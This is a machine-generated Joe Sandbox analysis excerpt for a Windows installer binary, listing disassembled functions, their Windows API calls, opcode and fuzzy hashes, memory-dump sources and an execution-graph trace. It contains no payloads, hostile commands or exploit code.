                                                • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                APIs
                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                • String ID: Version
                                                • API String ID: 512980652-315105994
                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                • GetTickCount.KERNEL32 ref: 00403303
                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                • String ID:
                                                • API String ID: 2883127279-0
                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringlstrcmp
                                                • String ID: !N~
                                                • API String ID: 623250636-529124213
                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                Strings
                                                • Error launching installer, xrefs: 00405C48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                APIs
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseHandlelstrlenwvsprintf
                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3509786178-2769509956
                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                Execution Graph

                                                Execution Coverage:4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:2%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:77
                                                execution_graph 98012 771016 98017 785ce7 98012->98017 98027 790fe6 98017->98027 98019 785cef 98020 77101b 98019->98020 98037 785f39 98019->98037 98024 792f70 98020->98024 98127 792e74 98024->98127 98026 771025 98030 790fee 98027->98030 98029 791008 98029->98019 98030->98029 98032 79100c std::exception::exception 98030->98032 98065 79593c 98030->98065 98082 7935d1 DecodePointer 98030->98082 98083 7987cb RaiseException 98032->98083 98034 791036 98084 798701 58 API calls _free 98034->98084 98036 791048 98036->98019 98038 785f42 98037->98038 98039 785cfb 98037->98039 98040 792f70 __cinit 67 API calls 98038->98040 98041 785d13 98039->98041 98040->98039 98093 781207 98041->98093 98045 785d6e 98052 785d9b 98045->98052 98111 781981 98045->98111 98047 785d8f 98115 78133d 98047->98115 98049 785e00 GetCurrentProcess IsWow64Process 98050 785e19 98049->98050 98053 785e98 GetSystemInfo 98050->98053 98054 785e2f 98050->98054 98051 7c1098 98052->98049 98052->98051 98055 785e65 98053->98055 98107 7855f0 98054->98107 98055->98020 98058 785e8c GetSystemInfo 98060 785e56 98058->98060 98059 785e41 98061 7855f0 2 API calls 98059->98061 98060->98055 98063 785e5c FreeLibrary 98060->98063 98062 785e49 GetNativeSystemInfo 98061->98062 98062->98060 98063->98055 98066 7959b7 98065->98066 98069 795948 98065->98069 98091 7935d1 DecodePointer 98066->98091 98068 7959bd 98092 798d58 58 API calls __getptd_noexit 98068->98092 98072 79597b RtlAllocateHeap 98069->98072 98075 795953 98069->98075 98076 7959a3 98069->98076 98080 7959a1 98069->98080 98088 7935d1 DecodePointer 98069->98088 98072->98069 98073 7959af 98072->98073 98073->98030 98075->98069 98085 79a39b 58 API calls 2 library calls 98075->98085 98086 79a3f8 58 API calls 8 library calls 98075->98086 98087 7932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98075->98087 98089 798d58 58 API calls __getptd_noexit 98076->98089 98090 798d58 58 API calls __getptd_noexit 98080->98090 98082->98030 98083->98034 98084->98036 98085->98075 98086->98075 98088->98069 98089->98080 98090->98073 98091->98068 98092->98073 98094 790fe6 Mailbox 59 API calls 98093->98094 98095 781228 98094->98095 98096 790fe6 Mailbox 59 API calls 98095->98096 98097 781236 GetVersionExW 98096->98097 98098 781821 98097->98098 98099 78189a 98098->98099 98100 78182d __wsetenvp 98098->98100 98101 781981 59 API calls 98099->98101 98102 781868 98100->98102 98103 781843 98100->98103 98106 78184b _memmove 98101->98106 98120 781c7e 98102->98120 98119 781b7c 59 API calls Mailbox 98103->98119 98106->98045 98108 785619 98107->98108 98109 7855f9 LoadLibraryA 98107->98109 98108->98058 98108->98059 98109->98108 98110 78560a GetProcAddress 98109->98110 98110->98108 98112 781998 _memmove 98111->98112 98113 78198f 98111->98113 98112->98047 98113->98112 98123 781aa4 98113->98123 98116 78134b 98115->98116 98117 781981 59 API calls 98116->98117 98118 78135b 98117->98118 98118->98052 98119->98106 98121 790fe6 Mailbox 59 API calls 98120->98121 98122 781c88 98121->98122 98122->98106 98124 781ab7 98123->98124 98126 781ab4 _memmove 98123->98126 98125 790fe6 Mailbox 59 API calls 98124->98125 98125->98126 98126->98112 98128 792e80 __freefls@4 98127->98128 98135 793447 98128->98135 98134 792ea7 __freefls@4 98134->98026 98152 799e3b 98135->98152 98137 792e89 98138 792eb8 DecodePointer DecodePointer 98137->98138 98139 792ee5 98138->98139 98140 792e95 98138->98140 98139->98140 98198 7989d4 59 API calls __controlfp_s 98139->98198 98149 792eb2 98140->98149 98142 792f48 EncodePointer EncodePointer 98142->98140 98143 792f1c 98143->98140 98148 792f36 EncodePointer 98143->98148 98200 798a94 61 API calls 2 library calls 98143->98200 98144 792ef7 98144->98142 98144->98143 98199 798a94 61 API calls 2 library calls 98144->98199 98147 792f30 98147->98140 98147->98148 98148->98142 98201 793450 98149->98201 98153 799e4c 98152->98153 98154 799e5f EnterCriticalSection 98152->98154 98159 799ec3 98153->98159 98154->98137 98156 799e52 98156->98154 98183 7932e5 58 API calls 3 library calls 98156->98183 98160 799ecf __freefls@4 98159->98160 98161 799ed8 98160->98161 98162 799ef0 98160->98162 98184 79a39b 58 API calls 2 library calls 98161->98184 98174 799f11 __freefls@4 98162->98174 98187 798a4d 58 API calls 2 library calls 98162->98187 98164 799edd 98185 79a3f8 58 API calls 8 library calls 98164->98185 98167 799f05 98169 799f1b 98167->98169 98170 799f0c 98167->98170 98168 799ee4 98186 7932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98168->98186 98171 799e3b __lock 58 API calls 98169->98171 98188 798d58 58 API calls __getptd_noexit 98170->98188 98175 799f22 98171->98175 98174->98156 98177 799f2f 98175->98177 98178 799f47 98175->98178 98189 79a05b InitializeCriticalSectionAndSpinCount 98177->98189 98190 792f85 98178->98190 98181 799f3b 98196 799f63 LeaveCriticalSection _doexit 98181->98196 98184->98164 98185->98168 98187->98167 98188->98174 98189->98181 98191 792fb7 _free 98190->98191 98192 792f8e RtlFreeHeap 98190->98192 98191->98181 98192->98191 98193 792fa3 98192->98193 98197 798d58 58 API calls __getptd_noexit 98193->98197 98195 792fa9 GetLastError 98195->98191 98196->98174 98197->98195 98198->98144 98199->98143 98200->98147 98204 799fa5 LeaveCriticalSection 98201->98204 98203 792eb7 98203->98134 98204->98203 98205 771055 98210 772a19 98205->98210 98208 792f70 __cinit 67 API calls 98209 771064 98208->98209 98211 781207 59 API calls 98210->98211 98212 772a87 98211->98212 98217 771256 98212->98217 98215 772b24 98216 77105a 98215->98216 98220 7713f8 59 API calls 2 library calls 98215->98220 98216->98208 98221 771284 98217->98221 98220->98215 98222 771275 98221->98222 98223 771291 98221->98223 98222->98215 98223->98222 98224 771298 RegOpenKeyExW 98223->98224 98224->98222 98225 7712b2 RegQueryValueExW 98224->98225 98226 7712d3 98225->98226 98227 7712e8 RegCloseKey 98225->98227 98226->98227 98227->98222 98228 775ff5 98252 775ede Mailbox _memmove 98228->98252 98229 790fe6 59 API calls Mailbox 98229->98252 98230 776a9b 98513 77a9de 299 API calls 98230->98513 98233 7aeff9 98533 775190 59 API calls Mailbox 98233->98533 98235 7af007 98534 7da48d 89 API calls 4 library calls 98235->98534 98239 7aefeb 98285 775569 Mailbox 98239->98285 98532 7c6cf1 59 API calls Mailbox 98239->98532 98240 7760e5 98241 7ae137 98240->98241 98246 7763bd Mailbox 98240->98246 98254 776abc 98240->98254 98269 776152 Mailbox 98240->98269 98241->98246 98514 7c7aad 59 API calls 98241->98514 98244 790fe6 Mailbox 59 API calls 98249 7763d1 98244->98249 98246->98244 98259 776426 98246->98259 98251 7763de 98249->98251 98249->98254 98255 776413 98251->98255 98256 7ae172 98251->98256 98252->98229 98252->98230 98252->98233 98252->98235 98252->98240 98252->98254 98252->98285 98298 7753b0 98252->98298 98469 7ec355 98252->98469 98512 77523c 59 API calls 98252->98512 98517 781c9c 98252->98517 98521 7d7f11 59 API calls Mailbox 98252->98521 98522 781a36 98252->98522 98526 7c6cf1 59 API calls Mailbox 98252->98526 98531 7da48d 89 API calls 4 library calls 98254->98531 98255->98259 98286 775447 Mailbox 98255->98286 98515 7ec87c 85 API calls 2 library calls 98256->98515 98516 7ec9c9 95 API calls Mailbox 98259->98516 98261 7ae19d 98261->98261 98263 7ae691 98528 7da48d 89 API calls 4 library calls 98263->98528 98264 7af165 98536 7da48d 89 API calls 4 library calls 98264->98536 98266 7769fa 98277 781c9c 59 API calls 98266->98277 98269->98239 98269->98254 98273 7ae2e9 VariantClear 98269->98273 98269->98285 98326 77cfd7 98269->98326 98345 7ee60c 98269->98345 98348 7dd6be 98269->98348 98393 7d412a 98269->98393 98396 7ef1b2 98269->98396 98401 7e5e1d 98269->98401 98426 77d679 98269->98426 98466 7d413a 98269->98466 98511 775190 59 API calls Mailbox 98269->98511 98527 7c7aad 59 API calls 98269->98527 98270 781c9c 59 API calls 98270->98286 98271 790fe6 59 API calls Mailbox 98271->98286 98272 7ae6a0 98273->98269 98274 7aea9a 98280 781c9c 59 API calls 98274->98280 98275 7769ff 98275->98263 98275->98264 98277->98285 98278 781207 59 API calls 98278->98286 98280->98285 98281 792f70 67 API calls __cinit 98281->98286 98282 7aeb67 98282->98285 98529 7c7aad 59 API calls 98282->98529 98283 7c7aad 59 API calls 98283->98286 98286->98263 98286->98266 98286->98270 98286->98271 98286->98274 98286->98275 98286->98278 98286->98281 98286->98282 98286->98283 98286->98285 98287 7aef28 98286->98287 98289 775a1a 98286->98289 98509 777e50 299 API calls 2 library calls 98286->98509 98510 776e30 60 API calls Mailbox 98286->98510 98530 7da48d 89 API calls 4 library calls 98287->98530 98535 7da48d 89 API calls 4 library calls 98289->98535 98299 7753cf 98298->98299 98323 7753fd Mailbox 98298->98323 98300 790fe6 Mailbox 59 API calls 98299->98300 98300->98323 98301 7769fa 98302 781c9c 59 API calls 98301->98302 98321 775569 Mailbox 98302->98321 98303 7769ff 98305 7ae691 98303->98305 98306 7af165 98303->98306 98304 790fe6 59 API calls Mailbox 98304->98323 98539 7da48d 89 API calls 4 library calls 98305->98539 98543 7da48d 89 API calls 4 library calls 98306->98543 98307 781207 59 API calls 98307->98323 98311 781c9c 59 API calls 98311->98323 98312 775a1a 98542 7da48d 89 API calls 4 library calls 98312->98542 98313 7ae6a0 98313->98252 98314 792f70 67 API calls __cinit 98314->98323 98315 7aea9a 98318 781c9c 59 API calls 98315->98318 98318->98321 98319 7aeb67 98319->98321 98540 7c7aad 59 API calls 98319->98540 98320 7c7aad 59 API calls 98320->98323 98321->98252 98323->98301 98323->98303 98323->98304 98323->98305 98323->98307 98323->98311 98323->98312 98323->98314 98323->98315 98323->98319 98323->98320 98323->98321 98324 7aef28 98323->98324 98537 777e50 299 API calls 2 library calls 98323->98537 98538 776e30 60 API calls Mailbox 98323->98538 98541 7da48d 89 API calls 4 library calls 98324->98541 98544 774d37 98326->98544 98330 77d018 98331 77d57b 98330->98331 98335 77d439 Mailbox __wsetenvp 98330->98335 98592 77502b 98330->98592 98331->98269 98334 790c65 62 API calls 98334->98335 98335->98331 98335->98334 98337 774f98 59 API calls 98335->98337 98340 774d37 84 API calls 98335->98340 98341 781821 59 API calls 98335->98341 98344 77502b 59 API calls 98335->98344 98567 79312d 98335->98567 98577 7859d3 